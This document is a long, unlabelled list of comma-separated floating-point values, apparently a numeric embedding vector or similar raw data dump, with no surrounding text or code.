0.04591740295290947, -0.03225824236869812, -0.005825231317430735, -0.01685820333659649, -0.05204765871167183, 0.005289577879011631, 0.03392471745610237, -0.0027117456775158644, 0.02609822526574135, -0.0482088103890419, -0.034311577677726746, 0.028449149802327156, -0.01906033419072628, -0.0535355843603611, -0.016917720437049866, 0.02630653604865074, -0.025562573224306107, -0.006933736149221659, 0.03585902228951454, 0.00953016709536314, -0.01779559813439846, 0.011791815049946308, -0.020741691812872887, -0.014522160403430462, -0.0008811313309706748, 0.03502578288316727, 0.019491834565997124, 0.0003443154273554683, 0.008815962821245193, -0.02112855203449726, -0.004854359198361635, 0.014953658916056156, 0.05847550183534622, 0.018048545345664024, -0.03249631077051163, 0.007086248602718115, -0.013659162446856499, -0.00907635036855936, 0.0036138007417321205, 0.0031841620802879333, -0.006565474439412355, -0.02352411299943924, 0.06326662003993988, -0.020176280289888382, -0.008265430107712746, -0.008674610406160355, -0.03657322749495506, 0.0024197399616241455, -0.02356875129044056, -0.011717419140040874, -0.011434713378548622, 0.009113548323512077, 0.0040285601280629635, 0.009210263378918171, -0.0012879861751571298, -0.016322551295161247, 0.00986495055258274, 0.010289009660482407, 0.03389495983719826, -0.02825571969151497, -0.0621953159570694, -0.004169913474470377, 0.010594034567475319, 0.0028605381958186626, 0.0019417437724769115, 0.03943004459142685, 0.012037322856485844, 0.02419367991387844, -0.01040804386138916, 0.019298402592539787, -0.026008950546383858, 0.035620953887701035, -0.009277219884097576, -0.037019602954387665, 0.03338906541466713, -0.01681356690824032, -0.040888212621212006, 0.019715022295713425, -0.02139637991786003, 0.009678959846496582, -0.017468253150582314, -0.009284659288823605, -0.004155034199357033, 0.008815962821245193, -0.016069604083895683, 0.03951932117342949, 0.012528338469564915, -0.0018440985586494207, -0.021976670250296593, -0.019759660586714745, 0.03803139552474022, 0.008905238471925259, 0.00924002192914486, 0.015578587539494038, -0.0034761675633490086, 0.009969105944037437, -0.003232519840821624, 0.006784943398088217, 0.0027173252310603857, -0.008250551298260689, 0.023315804079174995, -0.013755878433585167, 0.02023579739034176, -0.01712603121995926, 0.003972763195633888, 0.019610866904258728, -0.023806819692254066, 0.019610866904258728, 0.05091683566570282, -0.03294268622994423, 0.004434020258486271, -0.00495479442179203, 0.019343040883541107, -0.035531677305698395, 0.017423616722226143, -0.018941301852464676, -0.008555576205253601, 0.010125338099896908, -0.013822834938764572, -0.0021388940513134003, 0.002319304971024394, 0.010199734009802341, 0.01828661374747753, -0.009656641632318497, -0.0013298341073095798, 0.013636844232678413, 0.006662189494818449, 0.012692010961472988, 0.004452619235962629, 0.012126598507165909, -0.028285477310419083, -0.00503663020208478, -0.010936257429420948, -0.0025108754634857178, 0.033359307795763016, -0.03365689143538475, -0.03019002266228199, 0.006327406503260136, -0.0017771419370546937, 0.006223251577466726, -0.0017483133124187589, -0.013272302225232124, -0.001407950185239315, 0.009351616725325584, 0.0011410533916205168, 0.00018087602802552283, -0.021693965420126915, 0.027065377682447433, -0.04172145202755928, -0.003228799905627966, 0.024253197014331818, 0.00743591133505106, -0.033359307795763016, -0.014254333451390266, -0.01484950352460146, 0.022184981033205986, -0.010936257429420948, -0.007714897394180298, 0.024000249803066254, -0.002609450602903962, -0.004865518771111965, -0.011471911333501339, 0.018122941255569458, -0.0005742465145885944, -0.003450128948315978, -0.007130886428058147, -0.014477522112429142, -0.020295314490795135, 0.028850888833403587, -0.0034761675633490086, -0.029907317832112312, -0.03880511596798897, -0.006967214401811361, 0.02879137173295021, 0.0010229492327198386, -0.04112628102302551, 0.016515981405973434, -0.0026596682146191597, 0.02635117433965206, 0.03437109664082527, -0.03172258660197258, 0.01766168512403965, -0.010333647951483727, 0.017869994044303894, 0.011754617094993591, -0.015801776200532913, 0.014730469323694706, -0.0037160958163440228, -0.030800072476267815, -0.00020179999410174787, 0.006978373974561691, 0.03538288548588753, 0.02721417136490345, -0.012357227504253387, -0.000704905076418072, 0.00037732880446128547, 0.008138956502079964, -0.025785760954022408, 0.00649851793423295, 0.010638672858476639, -0.02734808437526226, -0.026470208540558815, 0.02825571969151497, 0.03880511596798897, 0.005776873789727688, -0.008979634381830692, -0.006613831967115402, -0.01923888549208641, 0.02099463902413845, -0.004902716726064682, -0.009872390888631344, -0.028106926009058952, 0.008473739959299564, 0.03419254347681999, 0.0020551981870085, 0.02812180668115616, 0.02752663567662239, -0.026559483259916306, -0.018375888466835022, 0.013592205941677094, 0.014923900365829468, 0.01518428698182106, -0.011501669883728027, 0.04740532860159874, 0.04573885351419449, 0.004694407340139151, -0.00248297699727118, -0.0014618874993175268, -0.020161399617791176, -0.051839351654052734, -0.002306285547092557, 0.00887547992169857, -0.005174263380467892, -0.013108629733324051, -0.010660991072654724, 0.029297268018126488, 0.013443413190543652, -0.0002915405493695289, -0.01725994423031807, 0.00495479442179203, -0.01164302323013544, -0.017245065420866013, -0.015132210217416286, 0.0003815135860349983, 0.011613264679908752, -0.03639467433094978, 0.020830966532230377, 0.023152131587266922, 0.020578019320964813, 0.003375732572749257, -0.008436542004346848, -0.027734944596886635, 0.015980327501893044, -0.025741124525666237, -0.009991425089538097, -0.026842189952731133, -0.028359873220324516, 0.004716726019978523, -0.011471911333501339, 0.00900939293205738, 0.014975977130234241, 0.02441686950623989, -0.024863246828317642, 0.022095704451203346, -0.040798936039209366, 0.0022746671456843615, -0.001587431295774877, -0.030442969873547554, 0.032198723405599594, 0.017721202224493027, -0.01721530593931675, 0.020607778802514076, 0.02856818400323391, 0.002042178763076663, 0.005341655109077692, 0.03740646690130234, 0.020087003707885742, -0.02005724608898163, 0.007376394234597683, -0.031008383259177208, 0.011665341444313526, 0.022452807053923607, -0.011851332150399685, 0.0038388497196137905, 0.027050498872995377, -0.0011317539028823376, 0.0007918557384982705, -0.04002521559596062, -0.0014023705152794719, -0.004262908827513456, -0.030249539762735367, 0.022914063185453415, -0.012989596463739872, -0.005434650462120771, 0.00451585603877902, 0.01825685426592827, 0.01848004385828972, -0.002408580621704459, -0.014789986424148083, 0.007138326298445463, 0.017155788838863373, 0.00020145125745330006, -0.03148451820015907, 0.020116763189435005, -0.02568160742521286, -0.0025499335024505854, -0.014053463004529476, 0.011137127876281738, -0.01385259348899126, 0.005981463473290205, -0.023419959470629692, -0.02194691263139248, 0.001728784292936325, 0.008615093305706978, -0.002739644143730402, -0.026752913370728493, 0.009403693489730358, 0.02252720296382904, 0.0003001426230184734, 0.013800515793263912, -0.008808523416519165, -0.009292099624872208, -0.005527645815163851, 0.03204993158578873, -0.000513799546752125, -0.0011829013237729669, -0.014544478617608547, 0.0018812967464327812, 0.012937518768012524, -0.009500408545136452, 0.010467560961842537, 0.011382635682821274, -0.010757707059383392, 0.019179368391633034, -0.015154528431594372, 0.0031358045525848866, 0.03350809961557388, 0.02459542080760002, 0.00650967750698328, 0.0009015902760438621, -0.00463117053732276, 0.015102451667189598, -0.026380931958556175, 0.004672088194638491, 0.019045455381274223, 0.007454510312527418, 0.022765271365642548, -0.019134731963276863, 0.015623225830495358, -0.03279389441013336, 0.024312714114785194, 0.0014851363375782967, -0.004445179831236601, 0.013956747949123383, -0.02888064831495285, -0.0009346036822535098, -0.012714330106973648, -0.0129970358684659, -0.03085958957672119, 0.05918970704078674, -0.01452959980815649, 0.011672780849039555, -0.03743622452020645, -0.013264862820506096, 0.024401990696787834, -0.007607022766023874, -0.034222304821014404, 0.007287118583917618, 0.004724165890365839, -0.03094886615872383, -0.03889439254999161, -0.024163922294974327, -0.017200427129864693, -0.020518502220511436, 0.020533382892608643, -0.020429227501153946, 0.0051705436781048775, -0.009716158732771873, -0.0038388497196137905, 0.019655505195260048, 0.019744781777262688, -0.003295756643638015, -0.013041673228144646, 0.010519638657569885, -0.015891052782535553, 0.021366620436310768, 0.0007560524973087013, -0.0222147386521101, 0.006148855201900005, 0.00419223215430975, -0.04627450555562973, -0.02108391560614109, -0.008644851855933666, 0.026648757979273796, -0.00022795495169702917, 0.03380568325519562, 0.033865202218294144, -0.02474421262741089, -0.026514844968914986, -0.012907760217785835, -0.023732423782348633, -0.008600213564932346, 0.027050498872995377, 0.022631358355283737, 0.012260512448847294, -0.01180669479072094, 0.027362963184714317, -0.019119851291179657, -0.016114240512251854, -0.013584766536951065, -0.0157720185816288, -0.019476953893899918, -0.01297471672296524, -0.009314417839050293, -0.022244496271014214, 0.01734922081232071, 0.031157175078988075, 0.03350809961557388, 0.028999682515859604, -0.04407237470149994, 0.03389495983719826, -0.01712603121995926, -0.009924467653036118, 0.002972132759168744, 0.0015781318070366979, 0.011323118582367897, -0.03451988846063614, 0.033537857234478, 0.01734922081232071, -0.009120987728238106, 0.0031971815042197704, 0.001618119771592319, 0.006550595164299011, 0.003677037777379155, -0.021411258727312088, 0.018718112260103226, 0.005010591819882393, -0.02681243047118187, -0.009455771185457706, 0.021232707425951958, 0.005315616261214018, -0.014938779175281525, -0.04889325425028801, 0.014953658916056156, 0.0037774727679789066, 0.019804298877716064, 0.0444294773042202, -0.009500408545136452, 0.008257990702986717, -0.014961098320782185, 0.010400604456663132, 0.002375102136284113, -0.044310443103313446, 0.01025181170552969, -0.022378411144018173, -0.0006314386846497655, -0.03261534124612808, 0.013406215235590935, 0.00011746479867724702, -0.04317962005734444, -0.03630540147423744, 0.025071557611227036, 0.03163331001996994, -0.021321982145309448, -0.0015139649622142315, -0.035620953887701035, 0.016873084008693695, 0.002823340008035302, -0.002319304971024394, 0.019209127873182297, -0.005836390424519777, 0.014105540700256824, -0.030919106677174568, 0.04091797024011612, 0.02005724608898163, 0.011204084381461143, 0.03324027359485626, 0.019164489582180977, -0.02325628697872162, 0.004400542005896568, -0.02194691263139248, -0.011680221185088158, 0.019313283264636993, -0.008525817655026913, 0.003928125370293856, 0.009128427132964134, 0.05889211967587471, -0.015578587539494038, 0.010705629363656044, 0.002667107852175832, 0.0004998501972295344, 0.002592711476609111, -0.009604563936591148, -0.0276605486869812, 0.007945526391267776, -0.010698189958930016, 0.014336169697344303, 0.0004180142714176327, 0.011590945534408092, 0.010058381594717503, 0.019700143486261368, 0.0069188568741083145, -0.006052140146493912, -0.027779582887887955, -0.0008485829457640648, -0.01595056988298893, -0.0439830981194973, -0.018122941255569458, 0.011047852225601673, 0.023643147200345993, -0.004597692284733057, -0.026187501847743988, 0.0051184664480388165, 0.019090093672275543, -0.01635230891406536, 0.004653489217162132, -0.029505576938390732, -0.019610866904258728, -0.022110583260655403, -0.015139649622142315, -0.010631232522428036, -0.0181080624461174, 0.027407601475715637, -0.026410691440105438, 0.004333585035055876, -0.03068103827536106, 0.01766168512403965, 0.024223439395427704, 0.029088957235217094, -0.03794211894273758, -0.013391336426138878, 0.007625621743500233, 0.024580541998147964, -0.04085845500230789, -0.01554882898926735, -0.0205482617020607, -0.024937644600868225, -0.011256162077188492, 0.018822267651557922, 0.035353127866983414, 0.029579972848296165, -0.01703675463795662, 0.013078871183097363, -0.011293360032141209, -0.01824197545647621, 0.0070676496252417564, 0.014678392559289932, -0.007938086055219173, -0.015370277687907219, 0.024297835305333138, 0.0025015759747475386, -0.0027861418202519417, -0.017006997019052505, 0.020518502220511436, 0.024952523410320282, -0.021441016346216202, -0.030978623777627945, -0.004259188659489155, 0.013108629733324051, 0.021798118948936462, -0.02310749515891075, -0.006840740796178579, 0.015080132521688938, 0.008339826948940754, 0.0017046055290848017, -0.009269780479371548, 0.0006146995001472533, -0.004564213566482067, -0.021113673225045204, 0.0228843055665493, -0.01225307211279869, -0.03362713381648064, 0.015667863190174103, 0.001870137290097773, 0.0004886907991021872, -0.03648395091295242, -0.015652984380722046, -0.02550305612385273, 0.016203517094254494, 0.03761477395892143, -0.03193089738488197, 0.00169251614715904, -0.021560050547122955, -0.01246138196438551, 0.022423047572374344, 0.0073689548298716545, 0.026008950546383858, -0.02001260779798031, -0.012148917652666569, -0.008622532710433006, -0.017155788838863373, 0.0024290396831929684, 0.03240703418850899, 0.007328036706894636, 0.0029981713742017746, 0.015154528431594372, -0.002884716959670186, -0.007045330945402384, 0.002600151114165783, 0.004872958641499281, -0.016739170998334885, -0.01301935501396656, -0.017378978431224823, 0.017453374341130257, -0.03166307136416435, -0.012803604826331139, 0.027958134189248085, 0.05671974644064903, 0.010638672858476639, -0.036156605929136276, -0.001623699557967484, -0.00012996105942875147, 0.021664205938577652, 0.006851900368928909, -0.01277384627610445, -0.020206037908792496, -0.012692010961472988, 0.014544478617608547, 0.018494922667741776, 0.05549964681267738, -0.022780150175094604, -0.00869692862033844, 0.0036863372661173344, -0.015214045532047749, -0.03794211894273758, 0.004817161243408918, -0.002959113335236907, -0.016917720437049866, -0.024000249803066254, 0.0006439930875785649, -0.036692261695861816, -0.029818041250109673, -0.005356534384191036, 0.0060818986967206, 0.004214550834149122, -0.004638609942048788, 0.005847549997270107, 0.007752095814794302, 0.039816904813051224, -0.014403126202523708, -0.016322551295161247, 0.035978056490421295, -0.01563810557126999, 0.04240589588880539, 0.0050329104997217655, -0.0034166506957262754, -0.019759660586714745, -0.00392068549990654, -0.0012061501620337367, -0.02743735909461975, 0.02757127396762371, -0.035174574702978134, 0.016010086983442307, 0.019268644973635674, -0.001866417471319437, 0.0010824663331732154, -0.009284659288823605, -0.02270575426518917, -0.025116194039583206, 0.011583506129682064, -0.010036062449216843, -0.017810476943850517, -0.00014379412459675223, 0.010289009660482407, 0.09612003713846207, -0.011695099994540215, -0.0016739170532673597, 0.0032139206305146217, 0.017914632335305214, 0.025562573224306107, 0.009768235497176647, 0.019402557983994484, -0.02135174162685871, 0.0015660423086956143, 0.013287181034684181, -0.006130256224423647, -0.006677068769931793, 0.017676563933491707, 0.02847890742123127, 0.0020793769508600235, -0.01318302657455206, -0.026976102963089943, 0.03252606838941574, -0.014090661890804768, -0.00975335668772459, 0.017096271738409996, 0.007990163750946522, -0.035978056490421295, 0.036751776933670044, -0.004229430109262466, -0.001835728995501995, -0.03157379478216171, -0.03463892266154289, 0.002726624719798565, -0.01815270073711872, 0.007566105108708143, -0.011337998323142529, -0.010207174345850945, 0.005445810034871101, 0.004422860685735941, 0.0092177027836442, 0.01232002954930067, -0.0035561437252908945, -0.015608346089720726, -0.001447938266210258, -0.0011410533916205168, -0.015965448692440987, -0.010735387913882732, 0.004352184012532234, -0.03707912191748619, 0.02496740221977234, -0.006732866168022156, -0.030978623777627945, -0.0049436348490417, 0.00953016709536314, -0.014782547019422054, 0.018643716350197792, 0.007145765703171492, 0.013309500180184841, 0.027050498872995377, 0.005256099626421928, 0.00034338547266088426, -0.012372106313705444, -0.024521024897694588, 0.010065820999443531, 0.007737216539680958, -0.03252606838941574, -0.0013995806220918894, 0.00784137099981308, -0.002890296746045351, -0.02730344608426094, 0.013063992373645306, -0.007662820164114237, 0.018539560958743095, 0.018643716350197792, 0.019982850179076195, 0.00070676498580724, -0.004221990704536438, 0.009448331780731678, 0.004772523418068886, 0.01522892527282238, 0.04966697841882706, -0.021113673225045204, -0.023122373968362808, 0.04160241782665253, 0.03306172043085098, 0.01455191895365715, 0.03928125277161598, 0.00784137099981308, 0.0362161248922348, -0.026693396270275116, -0.025666726753115654, -0.005602042190730572, -0.011576065793633461, -0.0009378584800288081, 0.008272869512438774, 0.0031209252774715424, -0.005003151949495077, 0.02721417136490345, 0.019432317465543747, 0.009106108918786049, -0.0009987704688683152, -0.02464005909860134, -0.01295239757746458, 0.012476261705160141, -0.016932601109147072, 0.026827309280633926, -0.0007955755572766066, -0.006974654272198677, 0.00547556858509779, 0.0007053700392134488, 0.019357919692993164, 0.0017148349434137344, -0.0018115502316504717, -0.0548747181892395, 0.0006574774160981178, 0.0259940717369318, -0.011330557987093925, -0.011218964122235775, 0.018450284376740456, 0.020295314490795135, -0.023806819692254066, -0.0011624423786997795, -0.03690056875348091, -0.007893448695540428, -0.014492401853203773, 0.0419892780482769, -0.0068667796440422535, 0.006063299253582954, 0.0010899059707298875, -0.030309056863188744, -0.02176836133003235, 0.010884180665016174, 0.016783807426691055, 0.024684695526957512, 0.02117319032549858, -0.005259819328784943, 0.0050440700724720955, 0.02821108140051365, -0.015459553338587284, 0.019536470994353294, 0.011687660589814186, -0.013354137539863586, 0.004902716726064682, -0.0035412644501775503, 0.010884180665016174, 0.04698871076107025, 0.001474906923249364, -0.0011838313657790422, -0.009351616725325584, 0.00784137099981308, 0.0009397183894179761, 0.024684695526957512, 0.01766168512403965, 0.01027413085103035, -0.04190000146627426, 0.015801776200532913, 0.024654937908053398, -0.0010861861519515514, 0.005315616261214018, -0.002512735314667225, -0.030651280656456947, -0.0004417281015776098, 0.009225142188370228, 0.0103857247158885, -0.015117330476641655, 0.019134731963276863, -0.0003354808723088354, -0.023315804079174995, 0.030041230842471123, 0.013502930290997028, -0.013465732336044312, -0.01491646096110344, -0.007540066260844469, 0.019700143486261368, -0.004471218213438988, -0.005527645815163851, 0.011613264679908752, 0.0025796920526772738, 0.00452701561152935, -0.003173002740368247, 0.026976102963089943, 0.03419254347681999, -0.041304830461740494, 0.004564213566482067, 0.010437802411615849, 0.01590593159198761, 0.0029312146361917257, 0.01662013679742813, -0.03204993158578873, -0.005691317841410637, 0.0035989214666187763, -0.023137252777814865, 0.013168146833777428, 0.009835192002356052, 0.03347834199666977, -0.005133345723152161, -0.009388814680278301, 0.0014070202596485615, -0.018093183636665344, -0.00633112620562315, -0.005985183175653219, 0.0008653220720589161, 0.006732866168022156, -0.007982724346220493, -0.017408736050128937, -0.0003933704865630716, -0.0005305386730469763, -0.002047758549451828, -0.02481861039996147, 0.00520402193069458, 0.011590945534408092, 0.015400036238133907, -0.02112855203449726, -0.018956180661916733, -0.012729208916425705, -0.0159952063113451, -0.00990958884358406, -0.007361514959484339, 0.002192831365391612, -0.004846919793635607, -0.02230401337146759, 0.012386986054480076, 0.014239453710615635, 0.0010136497439816594, 0.015920810401439667, 0.014403126202523708, 0.006762624718248844, -0.009225142188370228, 0.022051066160202026, 0.018599078059196472, -0.03356761485338211, -0.0034110709093511105, 0.016501102596521378, -0.009701278991997242, -0.02568160742521286, -0.006784943398088217, 0.016679653897881508, -0.019834056496620178, -0.019878694787621498, 0.022006429731845856, 0.009664081037044525, 0.012937518768012524, -0.0029312146361917257, 0.014767668209969997, -0.00734291598200798, -0.015489311888813972, -0.00856301560997963, -0.006197212729603052, -0.000301770051009953, 0.00017111151828430593, -0.016248155385255814, -0.015310760587453842, 0.03600781410932541, -0.010318768210709095, 0.015169408172369003, -0.010631232522428036, -0.006911417469382286, -0.017944389954209328, 0.035531677305698395, 0.01228283066302538, -0.0034817473497241735, 0.022006429731845856, 0.010132777504622936, 0.01551907043904066, -0.01897105947136879, -0.010683310218155384, 0.007938086055219173, -0.015251243487000465, 0.02609822526574135, -0.017066514119505882, -0.003677037777379155, -0.0009783115237951279, -0.007562384940683842, 0.001893386128358543, -0.005579723510891199, 0.0038946468848735094, -0.021232707425951958, -0.0006793313077650964, 0.015757137909531593, -0.002049618400633335, -0.008317507803440094, -0.0011419834336265922, -0.000020328210666775703, -0.005825231317430735, 0.058505259454250336, 0.0039058064576238394, -0.005940545350313187, 0.00840678345412016, -0.04511392489075661, -0.011360316537320614, -0.017066514119505882, 0.018271734938025475, -0.016143999993801117, -0.0051073068752884865, 0.017230186611413956, -0.003451988799497485, -0.01281848456710577, 0.008138956502079964, 0.005155664402991533, -0.02487812750041485, 0.009835192002356052, -0.019893573597073555, -0.01194060780107975, 0.01779559813439846, 0.03707912191748619, 0.04073942080140114, -0.0003454778634477407, -0.008964755572378635, 0.015124769881367683, -0.02001260779798031, -0.022423047572374344, 0.012000124901533127, -0.01554882898926735, 0.01045268215239048, 0.0031339447014033794, -0.014418005011975765, -0.015429794788360596, 0.0006119096651673317, -0.0205482617020607, -0.016649894416332245, 0.007510307710617781, 0.0015753419138491154, -0.012386986054480076, 0.003879767609760165, 0.010058381594717503, -0.03856704756617546, 0.007774414494633675, -0.005828951019793749, 0.011910849250853062, 0.010698189958930016, 0.001096415682695806, -0.0024978562723845243, -0.010683310218155384, 0.01505037397146225, -0.008674610406160355, 0.03767429292201996, -0.003037229413166642, 0.008622532710433006, -0.013562447391450405, 0.020354831591248512, 0.023509234189987183, -0.014209695160388947, 0.012007564306259155, -0.03853728994727135, 0.021649327129125595, -0.005907067097723484, 0.01897105947136879, 0.007134606130421162, 0.022675996646285057, 0.014083221554756165, 0.017899753525853157, 0.005404891911894083, -0.007670259568840265, -0.010876740328967571, 0.011836453340947628, 0.005055229179561138, 0.026068467646837234, -0.014544478617608547, -0.0006477129063569009, -0.004422860685735941, 0.0006165594095364213, 0.023449717089533806, -0.01626303419470787, -0.011568626388907433, 0.015191726386547089, -0.000264571892330423, -0.006223251577466726, 0.008637411519885063, 0.007528906688094139, 0.00019075679301749915, 0.0011038553202524781, 0.023955611512064934, -0.021842757239937782, -0.0005682018236257136, -0.0005719216424040496, 0.009723598137497902, 0.006814701948314905, 0.0040285601280629635, -0.012178676202893257, 0.02603871002793312, -0.008756445720791817, -0.007502867840230465, 0.03809091076254845, -0.005006871651858091, -0.02117319032549858, 0.004612571094185114, -0.01865859515964985, -0.02392585389316082, 0.014254333451390266, -0.017959268763661385, 0.003572882851585746, 0.014306411147117615, -0.01502805482596159, 0.010988335125148296, -0.01295239757746458, 0.012208434753119946, 0.017111152410507202, 0.010713068768382072, 0.0036733178421854973, -0.01022949256002903, 0.011620704084634781, -0.014492401853203773, -0.002760103205218911, 0.004218271002173424, -0.005345374811440706, 0.00836214516311884, 0.011330557987093925, 0.018375888466835022, 0.03213920816779137, -0.0015344239072874188, 0.0025480736512690783, 0.025309626013040543, -0.011836453340947628, 0.009515288285911083, -0.003093026578426361, -0.0015158248133957386, -0.011665341444313526, -0.017051635310053825, 0.0057136365212500095, -0.001824569539166987, 0.0052337804809212685, -0.0034203703980892897, -0.002875417470932007, 0.009202823974192142, -0.023181891068816185, -0.027928374707698822, -0.047107744961977005, 0.00462001096457243, -0.000005383561074268073, 0.006576634012162685, -0.015065252780914307, 0.005769433919340372, -0.012632493861019611, -0.005579723510891199, 0.01261761412024498, 0.022333772853016853, -0.007275959476828575, 0.02257184125483036, 0.0020849567372351885, -0.035710230469703674, -0.011717419140040874, 0.008778764866292477, 0.006338565610349178, 0.010623793117702007, -0.003446409245952964, -0.01025181170552969, -0.005088707897812128, -0.019253766164183617, -0.007960405200719833, -0.027288567274808884, -0.0063125272281467915, -0.01717066951096058, 0.005278418306261301, 0.020711932331323624, 0.004835760220885277, 0.002607590751722455, 0.02279502898454666, 0.015652984380722046, -0.025205470621585846, 0.010043501853942871, -0.0074731092900037766, -0.002812180668115616, 0.02028043381869793, 0.021932031959295273, -0.02248256467282772, 0.021649327129125595, 0.01112968847155571, 0.017780719324946404, -0.005494167562574148, -0.007722337264567614, -0.0021537733264267445, -0.010036062449216843, -0.007618182338774204, -0.002668967703357339, 0.001541863544844091, -0.0025536534376442432, 0.000668636872433126, 0.004143874626606703, -0.01694747991859913, -0.009083789773285389, -0.016843324527144432, 0.0015362838748842478, -0.016322551295161247, 0.005073828622698784, -0.003939284477382898, 0.0020868165884166956, 0.013302060775458813, -0.013086311519145966, 0.010512199252843857, -0.002389981411397457, -0.01180669479072094, 0.004381942562758923, 0.011769496835768223, -0.00990958884358406, 0.013755878433585167, -0.011226403526961803, 0.0011624423786997795, 0.032377276569604874, 0.0159952063113451, 0.017245065420866013, 0.023494355380535126, 0.006714267190545797, 0.0002945628948509693, 0.009656641632318497, -0.002895876532420516, 0.0020031207241117954, -0.008369585499167442, -0.0017427336424589157, 0.0013893510913476348, -0.000561692169867456, 0.009284659288823605, 0.0006751465261913836, -0.02694634348154068, -0.0098872696980834, -0.007112287450581789, -0.0028456589207053185, 0.00634228577837348, -0.0011503529967740178, 0.012468822300434113, 0.003597061615437269, -0.007134606130421162, -0.01572738029062748, -0.013398775830864906, 0.005218901205807924, 0.022914063185453415, 0.00011926658771699294, -0.01901569776237011, -0.00137168203946203, 0.0191049724817276, 0.013547568581998348, 0.01090649887919426, -0.006907697767019272, -0.005572283640503883, 0.006104217376559973, 0.003935564775019884, -0.005155664402991533, -0.012126598507165909, 0.0021649326663464308, -0.008473739959299564, 0.024625178426504135, -0.009969105944037437, 0.003001891076564789, -0.015891052782535553, 0.002339764032512903, -0.021441016346216202, 0.006245570257306099, 0.021560050547122955, 0.009701278991997242, -0.0031878820154815912, -0.013547568581998348, -0.0100509412586689, -0.006346005480736494, 0.01999772898852825, 0.006394363008439541, -0.011055291630327702, -0.00744707090780139, -0.027675427496433258, -0.00565411988645792, 0.017245065420866013, -0.0016125401016324759, 0.013592205941677094, 0.005910786800086498, 0.01617375761270523, 0.0004149919259361923, -0.015474433079361916, 0.031067900359630585, 0.008525817655026913, 0.015013176016509533, 0.03094886615872383, -0.0012917059939354658, -0.004664648789912462, 0.004512136336416006, -0.020488744601607323, 0.002877277322113514, -0.0036398395895957947, -0.013584766536951065, -0.007848811335861683, -0.011799255385994911, -0.007960405200719833, 0.030562004074454308, -0.028493788093328476, 0.0005189142539165914, 0.013041673228144646, -0.0011838313657790422, 0.00957480538636446, -0.03672201931476593, -0.03190113976597786, -0.003375732572749257, -0.014403126202523708, 0.0019175648922100663, -0.006814701948314905, -0.02248256467282772, -0.008637411519885063, 0.019343040883541107, 0.02594943344593048, -0.034668680280447006, 0.002183531643822789, -0.007461950182914734, -0.01277384627610445, -0.012758967466652393, -0.007692578714340925, 0.007670259568840265, 0.009515288285911083, -0.009760796092450619, 0.037376705557107925, -0.009515288285911083, -0.006267889402806759, -0.01419481635093689, -0.013071431778371334, 0.023181891068816185, 0.021560050547122955, -0.014336169697344303, -0.012468822300434113, 0.005955424625426531, -0.005709916818886995, -0.0012563676573336124, 0.0010917658219113946, -0.003377592656761408, -0.007819052785634995, 0.016367187723517418, -0.0018003907753154635, -0.006401802413165569, -0.02888064831495285, 0.008756445720791817, -0.004062038846313953, -0.007967844605445862, -0.001969642238691449, -0.0027210451662540436, 0.014715590514242649, 0.02095000073313713, -0.031335726380348206, 0.008927557617425919, 0.0010685169836506248, -0.0003545449289958924, 0.010727948509156704, 0.01232002954930067, 0.00046032716636545956, -0.005330495536327362, 0.04520319774746895, -0.001266597188077867, -0.0036919170524924994, 0.010631232522428036, 0.009500408545136452, -0.007328036706894636, -0.01146447192877531, -0.02474421262741089, -0.005668999161571264, -0.01538515742868185, 0.0056727188639342785, 0.03469844162464142, -0.006833301391452551, -0.009500408545136452, 0.01563810557126999, -0.004236869979649782, 0.006874219048768282, -0.0028419392183423042, 0.004887837450951338, -0.0012396285310387611, -0.016977237537503242, 0.004977113101631403, 0.0029981713742017746, 0.011509109288454056, -0.0012117299484089017, 0.014075782150030136, 0.011032973416149616, -0.01833125203847885, -0.001474906923249364, 0.003995081875473261, 0.009202823974192142, -0.010668431408703327, 0.010549397207796574, 0.008823402225971222, 0.00944089237600565, -0.007309437729418278, 0.013145828619599342, -0.010913939215242863, 0.006558035034686327, -0.011256162077188492, -0.0015790617326274514, 0.018956180661916733, 0.006606392562389374, -0.009173065423965454, -0.006044700276106596, 0.012580416165292263, -0.00479856226593256, 0.0057471152395009995, 0.00204403861425817, -0.008912677876651287, -0.03550191968679428, -0.011062731966376305, -0.010780025273561478, -0.003152543678879738, 0.014440324157476425, 0.015236364677548409, -0.003381312359124422, -0.0024253197479993105, -0.0008002253016456962, -0.006773784290999174, -0.03163331001996994, -0.009314417839050293, 0.0013214645441621542, 0.0005124046001583338, 0.0157720185816288, 0.02481861039996147, 0.002458798000589013, 0.012811045162379742, 0.018643716350197792, 0.0019826616626232862, 0.016188638284802437, -0.0033310947474092245, -0.007194123230874538, -0.0015939410077407956, -0.0002841009118128568, 0.026440449059009552, -0.013249983079731464, 0.0031153454910963774, -0.004921316169202328, -0.008994514122605324, 0.024803729727864265, 0.0010229492327198386, -0.018316371366381645, 0.005434650462120771, 0.007819052785634995, -0.006479918956756592, 0.008161275647580624, 0.018509801477193832, -0.002112855203449726, 0.012580416165292263, -0.0034240903332829475, -0.003037229413166642, -0.022631358355283737, -0.023687785491347313, 0.0020812368020415306, 0.006703107617795467, 0.00941857323050499, 0.021411258727312088, -0.017602168023586273, -0.00002310354284418281, -0.008116637356579304, 0.011873651295900345, -0.02645532786846161, -0.004672088194638491, -0.0029163353610783815, 0.030160265043377876, 0.002663387916982174, 0.012520899064838886, -0.016456464305520058, -0.025607209652662277, 0.011479350738227367, -0.038864634931087494, 0.016248155385255814, -0.02072681300342083, 0.02536914311349392, -0.013770757243037224, 0.017721202224493027, -0.01007326040416956, 0.0012108000228181481, 0.011977805756032467, -0.007893448695540428, -0.006967214401811361, 0.006695668213069439, -0.005646680016070604, -0.01712603121995926, 0.005438370164483786, 0.023360442370176315, 0.022914063185453415, 0.014611436054110527, 0.006967214401811361, 0.012595295906066895, -0.0008871760219335556, -0.01648622192442417, -0.008265430107712746, -0.024253197014331818, -0.010549397207796574, 0.013049112632870674, 0.03761477395892143, -0.0004242914728820324, -0.013569886796176434, -0.02635117433965206, 0.022780150175094604, -0.005732235964387655, 0.01354012917727232, -0.012803604826331139, -0.011352877132594585, -0.003037229413166642, -0.00047450896818190813, 0.013614525087177753, 0.020444106310606003, -0.008674610406160355, -0.0014228294603526592, 0.025577452033758163, 0.012312589213252068, -0.011218964122235775, -0.0020198598504066467, -0.016917720437049866, -0.0236580278724432, 0.00023830067948438227, -0.005832670722156763, -0.006379483733326197, -0.0212178286164999, 0.005836390424519777, 0.010006303898990154, -0.03204993158578873, 0.0007183894049376249, -0.025979192927479744, -0.003567303065210581, 0.02352411299943924, 0.0069300164468586445, 0.028583062812685966, 0.002940514124929905, 0.011613264679908752, 0.0017380837816745043, 0.007722337264567614, -0.021321982145309448, 0.011814134195446968, -0.0386563241481781, -0.004114116076380014, -0.01277384627610445, 